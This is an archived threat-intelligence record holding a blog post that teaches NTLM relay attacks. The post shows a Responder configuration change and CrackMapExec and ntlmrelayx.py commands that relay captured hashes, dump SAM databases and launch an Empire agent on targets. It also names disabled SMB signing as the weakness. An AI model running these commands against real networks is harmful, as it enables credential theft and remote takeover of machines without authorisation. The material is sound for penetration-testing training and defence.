{
	"id": "83c5e967-01ec-4a0d-903f-b92651a3e570",
	"created_at": "2026-04-06T00:18:52.753203Z",
	"updated_at": "2026-04-10T13:12:13.25082Z",
	"deleted_at": null,
	"sha1_hash": "269d282b0f83dc3089feef5ffa320341e68642a7",
	"title": "Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 79936,
	"plain_text": "Practical guide to NTLM Relaying in 2017 (A.K.A getting a\r\nfoothold in under 5 minutes) // byt3bl33d3r // /dev/random\r\nArchived: 2026-04-05 20:26:34 UTC\r\nThis blog post is mainly aimed to be a very 'cut \u0026 dry' practical guide to help clear up any confusion regarding\r\nNTLM relaying. Talking to pentesters I've noticed that there seems to be a lot of general confusion regarding what\r\nyou can do with those pesky hashes you get with Responder. I also noticed there doesn't seem to be an up to date\r\nguide on how to do this on the interwebs, and the articles that I did see about the subject either reference tools that\r\nare outdated, broken and/or not maintained anymore.\r\nI won't go into detail on all the specifics since there are a TON of papers out there detailing how the attack\r\nactually works, this one from SANS is a ok when it comes to the theory behind the attack.\r\nBefore we dive into the thick of it we need make sure we are on the same page with a couple of things.\r\nNTLM vs. NTLMv1/v2 vs. Net-NTLMv1/v2\r\nThis is where the confusion starts for a lot of people and quite frankly I don't blame them because all of the\r\narticles about this attack talk about NTLMv1/v2, so when they see Net-NTLMv1/v2 anywhere obviously people\r\nwonder if it's the same thing.\r\nEdit 06/05/2017 - Updated the TL;DR as it was brought to my attention the way I phrased it was still\r\nconfusing.\r\nTL;DR NTLMv1/v2 is a shorthand for Net-NTLMv1/v2 and hence are the same thing.\r\nHowever, NTLM (without v1/v2) means something completely different.\r\nNTLM hashes are stored in the Security Account Manager (SAM) database and in Domain Controller's NTDS.dit\r\ndatabase. They look like this:\r\naad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42\r\nContrary to what you'd expect, the LM hash is the one before the semicolon and the NT hash is the one after the\r\nsemicolon. Starting with Windows Vista and Windows Server 2008, by default, only the NT hash is stored.\r\nNet-NTLM hashes are used for network authentication (they are derived from a challenge/response algorithm and\r\nare based on the user's NT hash). Here's an example of a Net-NTLMv2 (a.k.a NTLMv2) hash:\r\nadmin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c\r\n(This hash was taken from the Hashcat example hash page here)\r\nhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\r\nPage 1 of 4\n\nFrom a pentesting perspective:\r\nYou CAN perform Pass-The-Hash attacks with NTLM hashes.\r\nYou CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.\r\nYou get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit\r\ndatabase or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows \u003e=\r\n8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's\r\nperfectly fine: obviously you can still Pass-The-Hash with just the NT hash.\r\nYou get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.\r\nThis article is going to be talking about what you can do with Net-NTLM in modern windows environments.\r\nRelaying 101\r\nSince MS08-068 you cannot relay a Net-NTLM hash back to the same machine you got it from (e.g. the\r\n'reflective' attack) unless you're performing a cross-protocol relay (which is an entirely different topic). However\r\nyou can still relay the hash to another machine.\r\nTL;DR you don't have to crack the hashes you get from Responder, you can directly relay them to other\r\nmachines!\r\nWhat's really cool about this? You can use Responder in combination with a relay tool to automatically intercept\r\nconnections and relay authentication hashes!\r\nThe only caveat to this attack? SMB Signing needs to be disabled on the machine you're relaying too. With the\r\nexception of Windows Server OS's, all Windows operating systems have SMB Signing disabled by default.\r\nPersonally, I consider SMB Signing to be one of the most overlooked and underrated security settings in Windows\r\nspecifically because of this attack and how easy it allows for attackers to gain an initial foothold.\r\nSetting up\r\nGrab Responder (do not use the version of Responder on SpiderLab's Github repository as it isn't maintained\r\nanymore, you should be using lgandx's fork), edit the Responder.conf file and turn off the SMB and HTTP servers:\r\n[Responder Core]\r\n; Servers to start\r\nSQL = On\r\nSMB = Off # Turn this off\r\nKerberos = On\r\nFTP = On\r\nPOP = On\r\nSMTP = On\r\nIMAP = On\r\nhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\r\nPage 2 of 4\n\nHTTP = Off # Turn this off\r\nHTTPS = On\r\nDNS = On\r\nLDAP = On\r\nNow you need a relaying tool.\r\nThere are 2 main tools that are maintained and updated regularly that can be used to perform relay attacks with\r\nNet-NTLMv1/v2 hashes:\r\nntlmrelayx.py which comes with the Impacket library\r\nMultiRelay.py that comes with the Responder toolkit.\r\nI personally use ntlmrelayx.py so I'll stick with that for this blogpost.\r\nInstall Impacket using pip or manually by git cloning the repo and running the setup file and it will put the\r\nntlmrelayx.py script in your path.\r\nNow you need list of targets to relay to.\r\nHow you do that is up to you. I personally use CrackMapExec: V4 has a handy --gen-relay-list flag just for\r\nthis:\r\ncme smb \u003cCIDR\u003e --gen-relay-list targets.txt\r\nThe above command will generate a list of all hosts with SMB Signing disabled and output them to the specified\r\nfile.\r\n0wning Stuff\r\nNow that you have everything you need, fire up Responder in one terminal window:\r\npython Responder.py -I \u003cinterface\u003e -r -d -w\r\nAnd ntlmrelayx.py in another:\r\nntlmrelayx.py -tf targets.txt\r\nBy default, ntlmrelayx.py upon a successful relay will dump the SAM database of the target.\r\nBuuuuut, you know whats even better? How about executing a command?\r\nntlmrelayx.py -tf targets.txt -c \u003cinsert your Empire Powershell launcher here\u003e\r\nhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\r\nPage 3 of 4\n\nNow, every time ntlmrelayx.py successfully relays a Net-NTLM hash, you will get an Empire agent! How cool is\r\nthat??!\r\nHere's a video of how it looks like in practice:\r\nLet's recap\r\n1. We're using Responder to intercept authentication attempts (Net-NTLM hashes) via Multicast/Broadcast\r\nprotocols.\r\n2. However, since we turned off Responder's SMB and HTTP servers and have ntlmrelayx.py running, those\r\nauthentication attempts get automatically passed to ntlmrelayx.py's SMB and HTTP servers\r\n3. ntlmrelayx.py takes over and relays those hashes to our target list. If the relay is successful it will execute\r\nour Empire launcher and give us an Empire Agent on the target machine.\r\nConclusion\r\nSMB Relaying attacks are very much still relevant. Having SMB Signing disabled in combination with\r\nMulticast/Broadcast protocols allow attackers to seamlessly intercept authentication attempts, relay them to other\r\nmachines and gain an initial foothold on an Active Directory network in a matter of minutes.\r\nNow, combine this with something like DeathStar and you have automated everything from getting a foothold to\r\ngaining Domain Admin rights!\r\nShout outs\r\nThese are the people responsible for these amazing tools, hard work and research. You should be following them\r\neverywhere!\r\nagsolino\r\ndirkjanm\r\nlgandx\r\nGo Top\r\nSource: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\r\nhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html"
	],
	"report_names": [
		"practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434732,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/269d282b0f83dc3089feef5ffa320341e68642a7.pdf",
		"text": "https://archive.orkl.eu/269d282b0f83dc3089feef5ffa320341e68642a7.txt",
		"img": "https://archive.orkl.eu/269d282b0f83dc3089feef5ffa320341e68642a7.jpg"
	}
}